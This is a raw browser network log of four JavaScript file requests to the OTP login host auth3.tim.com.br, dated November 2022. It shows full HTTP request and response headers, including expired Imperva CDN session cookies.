45.60.65.22200 OK 0 B URL HTTP/2 auth3.tim.com.br/OTP/js/jquery.bxslider.min.js
IP 45.60.65.22:0
GET /OTP/js/jquery.bxslider.min.js HTTP/1.1
Host: auth3.tim.com.br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://auth3.tim.com.br/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
date: Mon, 14 Nov 2022 04:16:43 GMT
server: Apache
last-modified: Mon, 12 Sep 2016 11:15:48 GMT
etag: "4284f-4e4c-53c4d9e356100"
accept-ranges: bytes
content-type: application/javascript
set-cookie: tim_cookie=rd51o00000000000000000000ffff0aa91ff5o20101; expires=Mon, 14-Nov-2022 05:16:43 GMT; path=/; Httponly; Secure
visid_incap_2787765=5fRYwnpZRlWaTacuZAb86inBcWMAAAAAQUIPAAAAAABbdb8vo/ujoNQUHQK1m1SG; expires=Tue, 14 Nov 2023 00:25:18 GMT; HttpOnly; path=/; Domain=.tim.com.br
incap_ses_721_2787765=CO1nOrJE5FMpuyia8YEBCivBcWMAAAAAFgzHlguBCOQJbPQKthvD0w==; path=/; Domain=.tim.com.br
x-cdn: Imperva
content-encoding: gzip
x-iinfo: 3-5173091-5173106 NNYN CT(243 732 0) RT(1668399401964 37) q(0 0 10 25) r(12 12) U5
X-Firefox-Spdy: h2
auth3.tim.com.br/OTP/js/bowser.js
45.60.65.22200 OK 0 B URL HTTP/2 auth3.tim.com.br/OTP/js/bowser.js
IP 45.60.65.22:0
GET /OTP/js/bowser.js HTTP/1.1
Host: auth3.tim.com.br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://auth3.tim.com.br/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
date: Mon, 14 Nov 2022 04:16:44 GMT
server: Apache
last-modified: Thu, 12 Jan 2017 19:10:36 GMT
etag: "1742ca-2219-545ea78dd8300"
accept-ranges: bytes
content-type: application/javascript
set-cookie: tim_cookie=rd51o00000000000000000000ffff0aa91fdeo20101; expires=Mon, 14-Nov-2022 05:16:44 GMT; path=/; Httponly; Secure
visid_incap_2787765=5fRYwnpZRlWaTacuZAb86inBcWMAAAAAQUIPAAAAAABbdb8vo/ujoNQUHQK1m1SG; expires=Tue, 14 Nov 2023 00:25:18 GMT; HttpOnly; path=/; Domain=.tim.com.br
incap_ses_721_2787765=ImzmaYebpSkpuyia8YEBCivBcWMAAAAAzOvDyFU99MRfO0lQ+QsfLA==; path=/; Domain=.tim.com.br
x-cdn: Imperva
content-encoding: gzip
x-iinfo: 3-5173091-5173097 PNYN RT(1668399401964 37) q(0 12 12 27) r(14 14) U5
X-Firefox-Spdy: h2
auth3.tim.com.br/OTP/js/spinner.js
45.60.65.22200 OK 0 B URL HTTP/2 auth3.tim.com.br/OTP/js/spinner.js
IP 45.60.65.22:0
GET /OTP/js/spinner.js HTTP/1.1
Host: auth3.tim.com.br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://auth3.tim.com.br/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
date: Mon, 14 Nov 2022 04:16:44 GMT
server: Apache
last-modified: Wed, 05 Sep 2018 17:22:45 GMT
etag: "1742c9-263-5752305ca4340"
accept-ranges: bytes
content-type: application/javascript
set-cookie: tim_cookie=rd51o00000000000000000000ffff0aa91fdeo20101; expires=Mon, 14-Nov-2022 05:16:44 GMT; path=/; Httponly; Secure
visid_incap_2787765=5fRYwnpZRlWaTacuZAb86inBcWMAAAAAQUIPAAAAAABbdb8vo/ujoNQUHQK1m1SG; expires=Tue, 14 Nov 2023 00:25:18 GMT; HttpOnly; path=/; Domain=.tim.com.br
incap_ses_721_2787765=R0EsdlMzZXwpuyia8YEBCivBcWMAAAAA1T/7Aarzz06HhGWB7iXRoQ==; path=/; Domain=.tim.com.br
x-cdn: Imperva
content-encoding: gzip
x-iinfo: 3-5173091-5173102 PNYN RT(1668399401964 37) q(0 12 12 28) r(14 14) U5
X-Firefox-Spdy: h2
auth3.tim.com.br/OTP/js/logClientV3.js
45.60.65.22200 OK 0 B URL HTTP/2 auth3.tim.com.br/OTP/js/logClientV3.js
IP 45.60.65.22:0
GET /OTP/js/logClientV3.js HTTP/1.1
Host: auth3.tim.com.br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://auth3.tim.com.br/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
date: Mon, 14 Nov 2022 04:16:43 GMT
server: Apache
last-modified: Mon, 25 Nov 2019 18:36:55 GMT
etag: "16e8fc-130-598300c411fc0"
accept-ranges: bytes
content-type: application/javascript
set-cookie: tim_cookie=rd51o00000000000000000000ffff0aa91fdeo20101; expires=Mon, 14-Nov-2022 05:16:43 GMT; path=/; Httponly; Secure
visid_incap_2787765=5fRYwnpZRlWaTacuZAb86inBcWMAAAAAQUIPAAAAAABbdb8vo/ujoNQUHQK1m1SG; expires=Tue, 14 Nov 2023 00:25:18 GMT; HttpOnly; path=/; Domain=.tim.com.br
incap_ses_721_2787765=WWbGIn8ILg4puyia8YEBCivBcWMAAAAAdlYD830QfXNsjxC3h+gXKw==; path=/; Domain=.tim.com.br
x-cdn: Imperva
content-encoding: gzip
x-iinfo: 3-5173091-5173097 NNYN CT(241 726 0) RT(1668399401964 27) q(0 0 10 1) r(13 13) U5
X-Firefox-Spdy: h2